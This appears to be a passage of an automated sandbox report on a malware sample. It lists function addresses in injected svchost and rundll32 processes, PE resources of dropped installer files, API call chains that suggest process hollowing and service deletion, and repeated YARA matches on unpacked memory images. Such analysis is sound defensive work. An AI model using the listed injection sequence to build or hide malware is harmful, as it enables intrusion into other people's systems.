Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1787F73016_2_0000012E1787F730
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1788CF5016_2_0000012E1788CF50
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1788C6B016_2_0000012E1788C6B0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178ABEE016_2_0000012E178ABEE0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17880E0016_2_0000012E17880E00
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17884E0016_2_0000012E17884E00
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17886E1016_2_0000012E17886E10
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1789BE2516_2_0000012E1789BE25
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1787964016_2_0000012E17879640
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1788466016_2_0000012E17884660
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1789C57516_2_0000012E1789C575
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178AC5B016_2_0000012E178AC5B0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178ADDC416_2_0000012E178ADDC4
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1789BC8D16_2_0000012E1789BC8D
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1789E48016_2_0000012E1789E480
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1788B4B016_2_0000012E1788B4B0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1787738016_2_0000012E17877380
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1980ACA816_2_0000012E1980ACA8
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198044D416_2_0000012E198044D4
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19805AE816_2_0000012E19805AE8
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1982173116_2_0000012E19821731
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198245C016_2_0000012E198245C0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19821D9716_2_0000012E19821D97
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1987B51016_2_0000012E1987B510
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1984C53016_2_0000012E1984C530
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1983448016_2_0000012E19834480
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198894C016_2_0000012E198894C0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1989C41016_2_0000012E1989C410
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1983243016_2_0000012E19832430
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1984B38016_2_0000012E1984B380
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198AC38016_2_0000012E198AC380
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198493E016_2_0000012E198493E0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198953E016_2_0000012E198953E0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198A874016_2_0000012E198A8740
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198816E016_2_0000012E198816E0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198745F016_2_0000012E198745F0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1984F5F016_2_0000012E1984F5F0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1982A60016_2_0000012E1982A600
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1985D64A16_2_0000012E1985D64A
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198D765416_2_0000012E198D7654
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1984A66016_2_0000012E1984A660
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198D691016_2_0000012E198D6910
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1988C95016_2_0000012E1988C950
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198D88B016_2_0000012E198D88B0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198D88B016_2_0000012E198D88B0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1987C8D016_2_0000012E1987C8D0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198358E016_2_0000012E198358E0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198E184416_2_0000012E198E1844
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1989084416_2_0000012E19890844
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1983285B16_2_0000012E1983285B
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1989678016_2_0000012E19896780
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198237AF16_2_0000012E198237AF
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19899AF016_2_0000012E19899AF0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19842B1016_2_0000012E19842B10
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19898A9016_2_0000012E19898A90
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198A1AA016_2_0000012E198A1AA0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19829A2016_2_0000012E19829A20
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198D9A3416_2_0000012E198D9A34
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19846A5016_2_0000012E19846A50
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19880A6016_2_0000012E19880A60
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1985DD3716_2_0000012E1985DD37
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19850D4016_2_0000012E19850D40
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19839D5516_2_0000012E19839D55
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198DEC7416_2_0000012E198DEC74
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1984EC8016_2_0000012E1984EC80
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19887C8016_2_0000012E19887C80
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19855CD016_2_0000012E19855CD0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19829CE016_2_0000012E19829CE0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19838C2016_2_0000012E19838C20
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19865C3016_2_0000012E19865C30
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198B3C6016_2_0000012E198B3C60
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19857B8016_2_0000012E19857B80
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19885BAD16_2_0000012E19885BAD
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198B1BD016_2_0000012E198B1BD0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198A7F2016_2_0000012E198A7F20
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1985CF3F16_2_0000012E1985CF3F
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1984FE0016_2_0000012E1984FE00
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198E3E2016_2_0000012E198E3E20
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1984AE4016_2_0000012E1984AE40
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1982508016_2_0000012E19825080
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1982809016_2_0000012E19828090
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19834FF016_2_0000012E19834FF0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1987BFF016_2_0000012E1987BFF0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198B303016_2_0000012E198B3030
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198ADF7016_2_0000012E198ADF70
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1989033F16_2_0000012E1989033F
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1986727016_2_0000012E19867270
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1989B2B016_2_0000012E1989B2B0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1982A21016_2_0000012E1982A210
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1989826016_2_0000012E19898260
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1988719016_2_0000012E19887190
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198BB1B016_2_0000012E198BB1B0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E174902E816_2_0000012E174902E8
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339F5E017_2_00000204F339F5E0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339B4B017_2_00000204F339B4B0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33A0CB017_2_00000204F33A0CB0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33ABC8D17_2_00000204F33ABC8D
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33AC57517_2_00000204F33AC575
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F338EBD017_2_00000204F338EBD0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33AE48017_2_00000204F33AE480
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339E45017_2_00000204F339E450
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33892C017_2_00000204F33892C0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33A72F017_2_00000204F33A72F0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33AC31E17_2_00000204F33AC31E
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33A831017_2_00000204F33A8310
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F338738017_2_00000204F3387380
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33B236017_2_00000204F33B2360
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339819017_2_00000204F3398190
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F338E20017_2_00000204F338E200
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33C79DC17_2_00000204F33C79DC
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33951D017_2_00000204F33951D0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F338528017_2_00000204F3385280
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33C026C17_2_00000204F33C026C
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F338810017_2_00000204F3388100
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33B010017_2_00000204F33B0100
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33B08E017_2_00000204F33B08E0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33C48CC17_2_00000204F33C48CC
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33CA11617_2_00000204F33CA116
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339115017_2_00000204F3391150
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3398FB017_2_00000204F3398FB0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3382FA017_2_00000204F3382FA0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33B680C17_2_00000204F33B680C
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339601017_2_00000204F3396010
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33A407017_2_00000204F33A4070
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33BA06817_2_00000204F33BA068
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339C6B017_2_00000204F339C6B0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33C9EFD17_2_00000204F33C9EFD
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33BBEE017_2_00000204F33BBEE0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F338F73017_2_00000204F338F730
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339CF5017_2_00000204F339CF50
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33BC5B017_2_00000204F33BC5B0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3390E0017_2_00000204F3390E00
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3394E0017_2_00000204F3394E00
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33BDDC417_2_00000204F33BDDC4
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F338964017_2_00000204F3389640
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33ABE2517_2_00000204F33ABE25
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3396E1017_2_00000204F3396E10
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339466017_2_00000204F3394660
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F32C02E817_2_00000204F32C02E8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC98E0 GetVersionExW,GetProcAddress,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDirectoryW,wsprintfW,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,Sleep,GetCurrentProcess,OpenProcessToken,DuplicateTokenEx,SetTokenInformation,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CreateProcessAsUserW,CloseHandle,CreateProcessW,LoadLibraryA,GetProcAddress,CloseHandle,GetThreadContext,VirtualAllocEx,TerminateProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,WaitForSingleObject,CloseHandle,WaitForSingleObject,OpenThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,WaitForSingleObject,CloseHandle,13_2_04EC98E0
Source: MSIFBC3.tmp.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MSIFBC3.tmp.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MSIFBC3.tmp.10.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: MSIFBC3.tmp.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MSIFBC3.tmp.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-JDQA9.tmp.11.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: is-JDQA9.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-JDQA9.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC3A20 OpenSCManagerW,OpenServiceW,QueryServiceStatus,ControlService,Sleep,DeleteService,wsprintfW,SHDeleteKeyW,CloseServiceHandle,CloseServiceHandle,13_2_04EC3A20
Source: 27.2.svchost.exe.2743a320000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 34.2.svchost.exe.202b28f0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 20.2.svchost.exe.1d91aad0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 24.2.svchost.exe.1dc51fb0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 37.2.svchost.exe.1afba170000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 13.2.rundll32.exe.4eb0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 28.2.svchost.exe.1111ac00000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 30.2.svchost.exe.1be5cd40000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 16.2.svchost.exe.12e17870000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 28.0.svchost.exe.1111ac00000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 34.0.svchost.exe.202b28f0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 25.2.svchost.exe.2216b8b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 17.0.svchost.exe.204f3380000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 34.0.svchost.exe.202b28f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 38.0.svchost.exe.25c96c80000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 27.2.svchost.exe.2743a320000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 37.0.svchost.exe.1afba170000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 19.2.svchost.exe.233426d0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 22.0.svchost.exe.222cab20000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 25.0.svchost.exe.2216b8b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 30.0.svchost.exe.1be5cd40000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 14.0.svchost.exe.24b7d0d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 24.0.svchost.exe.1dc51fb0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 21.0.svchost.exe.2f2c5c00000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 17.2.svchost.exe.204f3380000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 37.2.svchost.exe.1afba170000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 28.2.svchost.exe.1111ac00000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 31.2.svchost.exe.21c23140000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 23.2.svchost.exe.28621cd0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 27.0.svchost.exe.2743a320000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 30.2.svchost.exe.1be5cd40000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 29.0.svchost.exe.22f12740000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 28.0.svchost.exe.1111ac00000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 23.0.svchost.exe.28621cd0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 29.2.svchost.exe.22f12740000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 31.2.svchost.exe.21c23140000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 13.2.rundll32.exe.4eb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 31.0.svchost.exe.21c23140000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 27.0.svchost.exe.2743a320000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 25.2.svchost.exe.2216b8b0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 17.2.svchost.exe.204f3380000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 21.0.svchost.exe.2f2c5c00000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
